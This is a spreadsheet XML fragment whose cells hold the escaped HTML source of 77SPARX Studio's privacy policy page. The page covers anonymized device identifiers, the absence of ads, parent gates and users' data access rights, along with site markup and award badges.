                        &lt;path class="st2" d="M569.6,43.6c-0.2,2.1-0.5,4.2-0.8,6.3c0,0.5-0.2,1.1-0.3,1.6c29.6,23.7,40.3,63.9,26.3,99.1c-1.1-1.4-2.6-2.5-4.2-3.2c-5.4-2.1-11.4,0.5-13.6,5.8c-0.6,1.6-0.8,3.2-0.7,4.9c-5,0-9.4,3.1-11.2,7.7c0,0.1,0,0.2,0,0.4c-0.1-1.6,0.2-3.3,0.8-4.8c0.7-1.7,1.7-3.1,3-4.4c-1.4-8.2-9.2-13.8-17.4-12.4c-5.3,0.9-9.7,4.5-11.6,9.4l0,0c1.8,0.2,3.6,0.7,5.3,1.4c3.9,1.6,7.3,4.2,9.7,7.6c-9.3-8-23.3-7.1-31.4,2.1c3.7,2.6,6.4,6.5,7.6,10.9c-4.8-9.3-16.3-13-25.7-8.1c-7.9,4.1-11.9,13.2-9.6,21.8c-2.6-5-2.9-10.8-0.8-16c0.1-0.2,0.2-0.4,0.3-0.5c-2.5-0.6-5.1-0.7-7.7-0.2c0-0.1,0-0.2,0-0.3c3-7.1-0.3-15.4-7.5-18.4c-3.7-1.5-7.8-1.5-11.4,0.2l-0.3-0.4c2.3-2.4,5.4-3.8,8.7-3.8c0.9-1.1,1.7-2.3,2.2-3.6c1.9-4.6,0.8-9.8-2.7-13.3c-3.4,2.8-7.8,4.1-12.2,3.4c0,0,0,0,0-0.3c8.2-1.1,14-8.7,13-16.9c-1.1-8.2-8.7-14-16.9-13c-1.1,0.1-2.2,0.4-3.3,0.8c1.7,3.7,1.8,8,0.3,11.8c-0.3,0.6-0.6,1.2-0.9,1.8h-0.2c1.3-7.3-2.3-14.6-8.9-17.9c-2.6,3.4-7.2,4.8-11.3,3.4c5.6,0.3,10.4-4,10.8-9.6c0.3-4.4-2.3-8.5-6.4-10.1c-1.6-0.6-3.3-0.8-5-0.6c14-34.4,48.5-55.9,85.6-53.4c0.4-0.6,0.8-1.2,1.2-1.9c1.1-1.6,2.2-3.1,3.4-4.6c-51-5.9-97,30.6-103,81.6c-4.8,41.5,18.7,81.1,57.4,96.8c4.7,1.9,9.6,3.4,14.5,4.5c1,0.3,1.9,0.5,2.9,0.6c11.6,2.3,23.5,2.3,35.2,0l0,0c50.3-9.8,83.1-58.6,73.3-108.9C601.5,77.8,588.5,57.4,569.6,43.6z M546.2,173.6c-0.5,1.6-0.7,3.3-0.3,4.9c1,5,5.9,8.3,10.9,7.3c2.1-0.4,4-1.6,5.3-3.3c-1,3-3.6,5.3-6.8,6c-5,1-9.8-2.3-10.8-7.3c-0.5-2.5,0.1-5.2,1.6-7.2L546.2,173.6z M524.7,198c3.6-2.8,5.9-6.9,6.3-11.5c1.7,7-2.5,14.2-9.6,15.9c-3.1,0.8-6.5,0.4-9.3-1.1C516.6,202,521.2,200.8,524.7,198L524.7,198z M460.8,168.2c1.1,6.7,7.5,11.1,14.1,10c0.3,0,0.5-0.1,0.8-0.2c-4.5,2.9-10.6,1.6-13.5-3C460.9,173,460.4,170.5,460.8,168.2z M430.1,104.4L430.1,104.4L430.1,104.4z M452.6,136.6c2,4.8,1.1,10.2-2.4,14c3.7-8.3-0.1-18-8.4-21.7c-0.3-0.1-0.6-0.3-1-0.4c5.2,0,9.9,3.2,11.9,8h-0.1V136.6z" /&gt;
                        &lt;g&gt;
                            &lt;path class="st2" d="M669,90.7c2.2-4.7,3.3-9.9,3.2-15.2c0-3.2-0.5-6.4-1.4-9.5c-0.9-3-2.4-5.8-4.4-8.2c-2.1-2.4-4.6-4.4-7.5-5.7c-3.3-1.6-7-2.3-10.7-2.2h-56.1l14.5,17.8h41.5c0.9,0,1.7,0.3,2.3,0.9c0.7,0.7,1.3,1.4,1.8,2.2c0.5,0.9,0.9,1.8,1.2,2.8c0.2,0.8,0.4,1.7,0.4,2.6c0,1.1-0.2,2.2-0.6,3.2c-0.4,1.2-0.9,2.3-1.6,3.3c-0.6,1-1.4,1.9-2.3,2.6c-0.8,0.7-1.8,1-2.9,1.1h-24.5l34.4,41.9h24.4L658.4,100C663,98.3,666.8,95,669,90.7z" /&gt;
                            &lt;path class="st2" d="M753.6,58.9c-3.9-3.9-8.4-7-13.5-9.1c-5.3-2.3-11.1-3.4-16.9-3.3c-5.7-0.1-11.4,1.1-16.7,3.3c-15.8,6.8-26,22.4-25.9,39.6c-0.1,5.7,1.1,11.4,3.3,16.7c2.1,5,5.2,9.6,9.1,13.4c3.9,3.8,8.5,6.8,13.6,8.9c10.7,4.3,22.7,4.3,33.4,0c5-2.1,9.6-5.1,13.5-8.9c3.8-3.8,6.9-8.4,9-13.4c2.2-5.3,3.3-11,3.3-16.7c0.1-5.8-1-11.5-3.2-16.9C760.5,67.4,757.5,62.8,753.6,58.9z M745.5,98.9L745.5,98.9c-1.3,2.6-3,5.1-5.3,7.2s-4.9,3.8-7.8,4.9c-3,1.2-6.2,1.8-9.4,1.7c-3.2,0-6.3-0.6-9.2-1.9c-2.8-1.2-5.4-3-7.6-5.2c-2.2-2.2-3.9-4.7-5.2-7.5c-1.3-2.9-1.9-6-1.9-9.1c0-3.2,0.6-6.4,1.9-9.3c1.3-2.9,3-5.6,5.2-7.9c2.2-2.3,4.8-4.1,7.7-5.4c2.9-1.3,6.2-2,9.4-2c3.3,0,6.6,0.7,9.6,2c2.9,1.3,5.5,3.1,7.7,5.4c2.2,2.3,3.9,5,5.1,7.9c1.2,3,1.9,6.1,1.9,9.3C747.5,92.4,746.8,95.8,745.5,98.9z" /&gt;
                            &lt;path class="st2" d="M794.7,53.1c-4.3,2.1-8.1,5.1-11.2,8.7c-3.2,3.7-5.7,7.9-7.3,12.5c-1.7,4.7-2.5,9.7-2.5,14.7c0,4.7,0.8,9.3,2.3,13.8c1.5,4.6,3.8,8.8,6.8,12.6s6.8,6.9,11.1,9.2c4.6,2.5,9.8,3.7,15,3.6h39v-16.5h-37.4c-2.4,0-4.7-0.7-6.7-2c-2.3-1.3-4.4-3.1-6.1-5.1c-1.8-2.2-3.3-4.6-4.4-7.3c-1.1-2.7-1.6-5.5-1.7-8.4c0-2.9,0.6-5.7,1.7-8.3c1.1-2.6,2.6-5.1,4.4-7.3c1.6-2,3.6-3.7,5.8-5.1c1.8-1.2,3.9-1.9,6.1-1.9h38.2V49.7h-38.6C804.3,49.8,799.3,50.9,794.7,53.1z" /&gt;
                            &lt;polygon class="st2" points="907.3,49.8 879.5,82.8 879.5,49.8 859.7,49.8 859.7,128.2 879.5,128.2 879.5,95.5</t>
  </si>
  <si>
    <t>907.3,128.2 931.6,128.2 898.9,88.7 931.6,49.8 	" /&gt;
                            &lt;rect x="938.3" y="49.8" class="st2" width="63.3" height="16.5" /&gt;
                            &lt;polygon class="st2" points="938.3,87 938.3,95.3 938.3,111.7 938.3,128.2 957,128.2 1001.5,128.2 1001.5,111.7 957,111.7 957,95.3 1001.5,95.3 1001.5,78.7 938.3,78.7 	" /&gt;
                            &lt;polygon class="st2" points="1013.1,49.8 1013.1,66.3 1036.6,66.3 1036.6,128.2 1056.5,128.2</t>
  </si>
  <si>
    <t>1056.5,66.3 1080,66.3 1080,49.8 	"
                            /&gt;
                        &lt;/g&gt;
                    &lt;/svg&gt;
                    &lt;svg class="mobile" width="36px" height="41px" viewBox="0 0 36 41" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
                        &lt;path d="M17.0903301,13.66295 C16.8293798,14.9019839 15.7212061,15.1042043 15.1487766,15.1243568 L15.4824054,14.2960178 C15.5716961,14.0736449 15.9870017,13.0910348 15.8361073,13.0298822 L15.7025174,12.9749839 C15.4810211,12.8853398 14.6774048,13.7157636 14.5438148,13.9145093 C12.4472139,17.0395432 11.928082,20.4091873 11.928082,20.4091873 C11.8858592,20.8038992 11.9239289,21.0637975 12.1454252,21.1534415 L12.3357736,21.2305771 C12.5565777,21.3209161 12.7773818,21.0130687</t>
  </si>
  <si>
    <t>12.8666725,20.7906958 C14.4441415,17.3585093 16.7899258,18.3112382 16.7899258,18.3112382 C16.7899258,18.3112382 17.3305152,12.523289 17.0903301,13.66295"
                            id="Fill-20" fill="#4F5763"&gt;&lt;/path&gt;
                        &lt;path d="M24.2236878,16.5586619 C23.5536614,17.631611 24.2098442,18.5495941 24.6078454,18.9637636 L24.9414742,18.1354246</t>
  </si>
  <si>
    <t>C25.0307649,17.9130517 25.4121538,16.9172382 25.5637404,16.9783907 L25.6973303,17.0325941 C25.9188266,17.1229331 25.9215953,18.2806619 25.8800648,18.5162382</t>
  </si>
  <si>
    <t>C25.223882,22.2263907 23.2643319,25.011611 23.2643319,25.011611 C23.0213781,25.3243229 22.8137254,25.4848483 22.5929212,25.3945093 L22.4025728,25.3173737 C22.1810765,25.2277297 22.2357584,24.8524754 22.3257413,24.6301026 C23.567505,21.0624076</t>
  </si>
  <si>
    <t>21.2210285,20.1096788 21.2210285,20.1096788 C21.2210285,20.1096788 24.8397243,15.5718822 24.2236878,16.5586619 "
                            id="Fill-22" fill="#5E6674"&gt;&lt;/path&gt;
                        &lt;path d="M14.2625145,27.3976721 C14.0347887,27.3052483 13.9247327,27.04535 14.0174843,26.8167229 L16.7508871,20.0280958 C16.8235655,19.8488076</t>
  </si>
  <si>
    <t>17.0270653,19.7619432 17.2056466,19.8342144 L17.3828437,19.9057907 C17.5614251,19.9787568 17.6479471,20.1830619 17.5759608,20.3630449 L14.8411736,27.1516721 C14.7498064,27.3796043 14.4902404,27.4900958 14.2625145,27.3976721"
                            id="Fill-27" fill="#F2902A"&gt;&lt;/path&gt;
                        &lt;path d="M16.429579,29.7386331 C16.2018531,29.6462093</t>
  </si>
  <si>
    <t>16.0917971,29.386311 16.1838565,29.1576839 L19.4239321,21.1133449 C19.4959184,20.9333619 19.7001103,20.8464975 19.8786917,20.9194636 L20.0551966,20.9910398 C20.2344701,21.064006 20.3209921,21.268311 20.2483137,21.4475992 L17.0082381,29.4926331 C16.9161787,29.7205653 16.6573049,29.8310568 16.429579,29.7386331"
                            id="Fill-29" fill="#F2902A"&gt;&lt;/path&gt;
                        &lt;path d="M14.1388227,31.5654958 C13.9110968,31.4730721 13.8010408,31.2131737 13.8937924,30.9845466 L18.0876865,20.5705466 C18.1596727,20.3905636 18.3638647,20.3043941</t>
  </si>
  <si>
    <t>18.542446,20.3766653 L18.7189509,20.4482415 C18.8975323,20.5212076 18.9840543,20.7255127 18.912068,20.9054958 L14.7174818,31.3188009 C14.6261146,31.547428 14.3665486,31.6579195 14.1388227,31.5654958"
                            id="Fill-31" fill="#F98B22"&gt;&lt;/path&gt;
                        &lt;path d="M26.9217204,9.52903816 C27.5903623,5.66669917 26.6787666,0.190072053</t>
  </si>
  <si>
    <t>26.6787666,0.190072053 L26.6400048,0.283885613 L26.5998585,0.378394087 L26.6766901,0.189377138 C26.6766901,0.189377138 22.2294596,3.49091951 20.0366463,6.734089 C16.821489,11.4880043 16.2878213,18.1070721 16.2878213,18.1070721 L16.9959173,18.394767 C16.9190858,18.7665466 17.1135872,19.1515297 17.4762874,19.2988517 L18.7699643,19.8235127 L20.0636411,20.3488687 C20.4270335,20.4961907 20.8333408,20.3551229 21.0354561,20.034767 L21.7435521,20.321767 C21.7435521,20.321767 25.9415992,15.1905127 26.9217204,9.52903816"
                            id="Fill-24" fill="#5E6674"&gt;&lt;/path&gt;
                        &lt;path d="M26.599997,0.378463579 L26.6761363,0.18944663</t>
  </si>
  <si>
    <t>C26.6761363,0.18944663 22.2295981,3.490989 20.0367847,6.73415849 C16.8216274,11.4880737</t>
  </si>
  <si>
    <t>16.2879598,18.1071415 16.2879598,18.1071415 L16.9960558,18.3948365 C16.9192242,18.7666161 17.1137257,19.1515992 17.4764259,19.2989212 L18.7701027,19.8235822 L26.6401432,0.283955104 L26.599997,0.378463579 Z"
                            id="Fill-33" fill="#4F5763"&gt;&lt;/path&gt;
                        &lt;path d="M5.85735285,26.3356331 C6.25535401,27.2772432 6.03801077,28.3244805 5.39013408,29.0305144 C5.72445506,28.2612432 5.75767951,27.3620229 5.40536195,26.5281246 C5.0530444,25.6942263 4.38578679,25.0931246 3.60224362,24.7998704 C4.55883078,24.8228026 5.45935168,25.3940229 5.85735285,26.3356331 M1.57139941,20.1849382 C1.565862,20.1891076 1.56032459,20.1939721 1.55478718,20.1981415 C1.55617154,20.1898026 1.55755589,20.1821585 1.55894024,20.1731246 C1.56309329,20.1772941 1.56655417,20.1814636 1.57139941,20.1849382 M7.41890177,32.3883449 C7.52618904,33.0040398 7.87366137,33.5759551 8.43293953,33.9477348 C8.99290987,34.3202093 9.65324572,34.4174975 10.2588997,34.2764297 C9.65601442,34.6565483 8.86347297,34.6739212 8.23151633,34.2534975 C7.59955969,33.8337687 7.30607709,33.0943788 7.41890177,32.3883449 M19.6053514,38.0963788</t>
  </si>
  <si>
    <t>C20.3169083,37.5397517 20.7225234,36.7364297 20.8021236,35.9011415 C21.0270808,36.8351076 20.7100642,37.8566331 19.9071401,38.4855314 C19.104216,39.1144297 18.0403416,39.1741924 17.1931183,38.7280568 C18.0195763,38.8538365 18.8937946,38.6537009 19.6053514,38.0963788 M23.7037252,33.4168195 C23.600591,33.7121585 23.5722118,34.0373788</t>
  </si>
  <si>
    <t>23.6414293,34.3660737 C23.8428525,35.3201924 24.7765979,35.9296331 25.7269555,35.7267178 C26.1491828,35.6370737 26.5028847,35.4014975 26.7486072,35.0846161 C26.5520292,35.6474975 26.0778887,36.0964127 25.4549303,36.2298365</t>
  </si>
  <si>
    <t>C24.5045727,36.4320568 23.5708274,35.8226161 23.3694042,34.8684975 C23.2579639,34.3382771 23.3957069,33.8136161 23.7037252,33.4168195 M28.1613383,8.51383646 C28.1225764,8.92453138</t>
  </si>
  <si>
    <t>28.0713554,9.32897205 28.0049065,9.7181246 C27.9869099,9.81749748 27.9668368,9.91687036 27.9481481,10.0162432 C33.4613295</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" prefix="og: http://ogp.me/ns#"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8" /&gt;
&lt;title&gt;Privacy Policy - 77SPARX Studio&lt;/title&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
&lt;link rel="pingback" href="https://www.77sparx.com/xmlrpc.php" /&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;!-- This site is optimized with the Yoast SEO plugin v5.9.3 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;link rel="canonical" href="https://www.77sparx.com/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy Policy - 77SPARX Studio" /&gt;
&lt;meta property="og:description" content="We respect your right to privacy and we understand that you need to control the uses of your personal information. This Privacy Policy describes the information collected by 77SPARX Studio, Inc (“we,” “us” or “our”) through our mobile applications and website and how we use that information.</t>
  </si>
  <si>
    <t>Information Collection, Use, and Sharing • We may &amp;hellip;" /&gt;
&lt;meta property="og:url" content="https://www.77sparx.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="77SPARX Studio" /&gt;
&lt;meta property="og:image" content="http://www.77sparx.com/wp-content/uploads/2013/09/KWI-Logo-Small-02-1.png" /&gt;
&lt;script type='application/ld+json'&gt;{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.77sparx.com\/","name":"77SPARX Studio","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.77sparx.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}&lt;/script&gt;
&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="77SPARX</t>
  </si>
  <si>
    <t>Studio &amp;raquo; Feed" href="https://www.77sparx.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="77SPARX Studio &amp;raquo; Comments Feed" href="https://www.77sparx.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="77SPARX Studio &amp;raquo; Privacy Policy Comments Feed" href="https://www.77sparx.com/privacy-policy/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.77sparx.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*!</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</si>
  <si>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id='wp-block-library-css' href='https://www.77sparx.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.77sparx.com/wp-includes/css/classic-themes.min.css?ver=1'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</si>
  <si>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rel='stylesheet' id='gglcptch-css' href='https://www.77sparx.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.33' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='spx-css' href='https://www.77sparx.com/wp-content/themes/hustle-sparx/build/css/style.min.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Chewy' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='woodojo-social-widgets-css' href='https://www.77sparx.com/wp-content/plugins/woodojo/bundled/woodojo-social-widgets/assets/css/style.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='slb_core-css' href='https://www.77sparx.com/wp-content/plugins/simple-lightbox/client/css/app.css?ver=2.6.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='theme-stylesheet-css' href='https://www.77sparx.com/wp-content/themes/hustle-sparx/style.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='woo-layout-css' href='https://www.77sparx.com/wp-content/themes/hustle/css/layout.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://www.77sparx.com/wp-content/plugins/continuous-announcement-scroller/continuous-announcement-scroller.js?ver=6.1.1' id='continuous-announcement-scroller-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.77sparx.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.77sparx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.77sparx.com/wp-content/themes/hustle/includes/js/third-party.js?ver=6.1.1' id='third party-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.77sparx.com/wp-content/themes/hustle/includes/js/general.js?ver=6.1.1' id='general-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.77sparx.com/wp-json/" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/json" href="https://www.77sparx.com/wp-json/wp/v2/pages/595" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.77sparx.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.77sparx.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel='shortlink' href='https://www.77sparx.com/?p=595' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.77sparx.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.77sparx.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate " type="text/xml+oembed" href="https://www.77sparx.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.77sparx.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Theme version --&gt;
&lt;meta name="generator" content="77SPARX 1.0" /&gt;
&lt;meta name="generator" content="Hustle 1.1.14" /&gt;
&lt;meta name="generator" content="WooFramework 5.5.5" /&gt;
&lt;!-- Always force latest IE rendering engine (even in intranet) &amp; Chrome Frame --&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /&gt;
&lt;!--  Mobile viewport scale | Disable user zooming as the layout is optimised --&gt;
&lt;meta content="initial-scale=1.0; maximum-scale=1.0; user-scalable=no" name="viewport"/&gt;
&lt;!--[if lt IE 9]&gt;_x005F_x000D_
&lt;script src="https://html5shim.googlecode.com/svn/trunk/html5.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;_x005F_x000D_
&lt;!-- Woo Custom Styling --&gt;
&lt;style type="text/css"&gt;
#intro-message.home-section { background-image: url(http://www.77sparx.com/wp-content/uploads/2013/08/Setting-Button-300x167.png); }&lt;/style&gt;
&lt;!-- Alt Stylesheet --&gt;
&lt;link href="https://www.77sparx.com/wp-content/themes/hustle/styles/default.css" rel="stylesheet" type="text/css" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Custom Favicon --&gt;
&lt;link rel="shortcut icon" href="http://www.77sparx.com/wp-content/uploads/2012/06/77_Sparx-light-final-square16x16.png"/&gt;
&lt;!-- Woo Shortcodes CSS --&gt;
&lt;link href="https://www.77sparx.com/wp-content/themes/hustle/functions/css/shortcodes.css" rel="stylesheet" type="text/css" /&gt;
&lt;!-- Custom Stylesheet --&gt;
&lt;link href="https://www.77sparx.com/wp-content/themes/hustle/custom.css" rel="stylesheet" type="text/css" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Webfonts --&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Arvo:r,b,i,bi|Cabin:400,400italic,700,700italic," rel="stylesheet" type="text/css" /&gt;
&lt;/head&gt;
&lt;body class="page-template page-template-template-fullwidth page-template-template-fullwidth-php page page-id-595 no-js unknown alt-style-default layout-left-content"&gt;
&lt;div id="wrapper"&gt;
	&lt;header id="header"&gt;
		&lt;div class="col-full"&gt;
				_x005F_x000D_
	&lt;a id="logo" href="https://www.77sparx.com/" title="Digital Toys | 77SPARX"&gt;_x005F_x000D_
		&lt;img src="https://www.77sparx.com/wp-content/uploads/2013/11/logo2.png" alt="77SPARX Studio" /&gt;_x005F_x000D_
	&lt;/a&gt;_x005F_x000D_
		    &lt;hgroup&gt;
				&lt;h1 class="site-title"&gt;&lt;a href="https://www.77sparx.com/"&gt;77SPARX Studio&lt;/a&gt;&lt;/h1&gt;
				&lt;h2 class="site-description"&gt;Digital Toys | 77SPARX&lt;/h2&gt;
				&lt;span class="nav-toggle"&gt;&lt;a href="#navigation"&gt;&lt;span&gt;Navigation&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;
			&lt;/hgroup&gt;
			&lt;nav id="navigation" role="navigation"&gt;
				&lt;ul id="main-nav" class="nav fl"&gt;&lt;li id="menu-item-999" class="nav-ico ico-puzzingo menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-999"&gt;&lt;a title="Puzzingo" href="https://www.77sparx.com/puzzingo/"&gt;PUZZINGO Puzzles&lt;/a&gt;
&lt;ul class="sub-menu"&gt;
	&lt;li id="menu-item-1105" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1105"&gt;&lt;a href="http://www.77sparx.com/puzzingo"&gt;PUZZINGO Puzzles Free&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-1104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1104"&gt;&lt;a title="PUZZINGO Puzzles Pro Edition" href="https://www.77sparx.com/puzzingo-puzzles-pro-edition/"&gt;PUZZINGO Puzzles Pro&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li id="menu-item-1282" class="nav-ico ico-wonster menu-item menu-item-type-post_type menu-item-object-page menu-item-1282"&gt;&lt;a title="Wonster Words" href="https://www.77sparx.com/wonsterwords/"&gt;Wonster Words&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-994" class="nav-ico ico-blog menu-item menu-item-type-post_type menu-item-object-page menu-item-994"&gt;&lt;a href="https://www.77sparx.com/blog/"&gt;Blog&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1055" class="nav-ico ico-support menu-item menu-item-type-post_type menu-item-object-page menu-item-1055"&gt;&lt;a href="https://www.77sparx.com/support/"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
			&lt;/nav&gt;&lt;!-- /#navigation --&gt;
		&lt;/div&gt;
	&lt;/header&gt;&lt;!-- /#header --&gt;
	       _ x000D_
    &lt;div id="content" class="page col-full"&gt;_x005F_x000D_
    _</t>
  </si>
  <si>
    <t>x000D_
    	    	_x005F_x000D_
		&lt;section id="main" class="fullwidth"&gt;_x005F_x000D_
           _x005F_x000D_
                                                                     _ x000D_
                &lt;article class="post-595 page type-page status-publish hentry"&gt;_x005F_x000D_
					_x005F_x000D_
					&lt;header&gt;_x005F_x000D_
						&lt;h1&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
					&lt;/header&gt;_x005F_x000D_
                    _ x000D_
                    &lt;section class="entry"&gt;_x005F_x000D_
	                	&lt;p&gt;We respect your right to privacy and we understand that you need to control the uses of your personal information.</t>
  </si>
  <si>
    <t>This Privacy Policy describes the information collected by 77SPARX Studio, Inc (“we,” “us” or “our”) through our mobile applications and website and how we use that information.&lt;/p&gt;
&lt;h2&gt;Information Collection, Use, and Sharing&lt;/h2&gt;
&lt;p&gt;• We may use technologies like anonymized device identifiers to anonymously identify your device purely for internal analytics and operations purposes, so we can improve our products and deliver a better experience.&lt;br /&gt;
• We do not have advertising in any of our products.&lt;br /&gt;
• We may have parent-directed contents such as parent information, in-app-purchase, email subscription signup, and external links. All such contents are protected by parent gates to ensure only parents have access to these contents.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not collect information such as your name, address, or phone number. You may subscribe to our email distribution only with your consent. We only have access to/collect personal information that you voluntarily give us via email or other direct contact from you.</t>
  </si>
  <si>
    <t>We will not sell, rent, or otherwise share this information with anyone. We will use your information to respond to you regarding the reason you contacted us, e.g. to provide support.&lt;/p&gt;
&lt;p&gt;Unless you ask us not to, we may contact you via email in the future to tell you about specials, new products or services, or changes to this privacy policy. You may opt out of any future contacts from us at any time.&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Your Access to and Control Over Information&lt;/h2&gt;
&lt;p&gt;You may contact us anytime via the email address below to:&lt;br /&gt;
• See what data we have about you, if any.&lt;br /&gt;
• Change/correct any data we may have about you.&lt;br /&gt;
• Have us delete any data we may have about you.&lt;br /&gt;
• Express any concern you have about our use of your data.&lt;/p&gt;
&lt;h2&gt;Security&lt;/h2&gt;
&lt;p&gt; We take precautions to protect your information.  Only employees who need the information to perform a specific job (for example, billing or customer service) are granted access to personally identifiable information.&lt;/p&gt;
&lt;p&gt;If you have questions or feel that we are not abiding by this privacy policy, you should contact us immediately &lt;a href="mailto:info@77sparx.com?Subject=Privacy%20Policy"&gt;&lt;br /&gt;
info@77sparx.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img decoding="async" class="alignleft size-full wp-image-1119" src="https://www.77sparx.com/wp-content/uploads/2013/09/KWI-Logo-Small-02-1.png"</t>
  </si>
  <si>
    <t>alt="Know What's Inside Logo" width="118" height="214" /&gt;&lt;/p&gt;
	               	&lt;/section&gt;&lt;!-- /.entry --&gt;_x005F_x000D_
_x005F_x000D_
					_ x000D_
                &lt;/article&gt;&lt;!--</t>
  </si>
  <si>
    <t>/.post --&gt;_x005F_x000D_
                                                    _x005F_x000D_
			  _x005F_x000D_
        _ x000D_
		&lt;/section&gt;&lt;!-- /#main --&gt;_x005F_x000D_
		_x005F_x000D_
				_x005F_x000D_
    &lt;/div&gt;&lt;!-- /#content</t>
  </si>
  <si>
    <t>--&gt;_x005F_x000D_
		_x005F_x000D_
	_x005F_x000D_
			_ x000D_
	&lt;section id="footer-widgets" class="col-full col-2 fix"&gt;_x005F_x000D_
_x005F_x000D_
					_ x000D_
		&lt;div class="block footer-widget-1"&gt;_x005F_x000D_
        	&lt;div id="text-8" class="widget widget_text"&gt;&lt;h3&gt;</t>
  </si>
  <si>
    <t>Awards we have received&lt;/h3&gt;			&lt;div class="textwidget"&gt;&lt;img src="https://www.77sparx.com/wp-content/uploads/2014/08/EditorsChoiceAward-v2-150.png" alt="Children&amp;#039;s Technology Review Editor&amp;#039;s Choice Award" width="148" height="148" class="aligncenter size-medium wp-image-1159" /&gt; _x005F_x000D_
_x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2015/10/10best_childrens150x150.png" alt="Dr Toy 10 Best Children Product" width="150" height="150" class="aligncenter size-medium wp-image-1159" /&gt; _x005F_x000D_
_x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2014/11/MCA_Logo_Gold-150.png" alt="Mom&amp;#039;s Choice Gold" width="150" height="150" class="aligncenter size-medium wp-image-1159" /&gt; _x005F_x000D_
_x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2013/10/ParentsChoiceRecommended-300x300.png" alt="Parent&amp;#039;s Choice Recommended" width="150" height="150" class="aligncenter size-medium wp-image-1159" /&gt; _x005F_x000D_
_x005F_x000D_
&lt;img height="140" src="http://www.appysmarts.com/img/appysmarts_favourite_120.png" width="140" alt="Appysmarts Editor's Favorite"&gt;_x005F_x000D_
_x005F_x000D_
&lt;img src="https://www.77sparx.com/wp-content/uploads/2014/10/Award-NAPPASilver-150.jpg" alt="NAPPA Award Winner" width="150" height="150" class="aligncenter size-medium wp-image-1159" /&gt;_x005F_x000D_
_x005F_x000D_
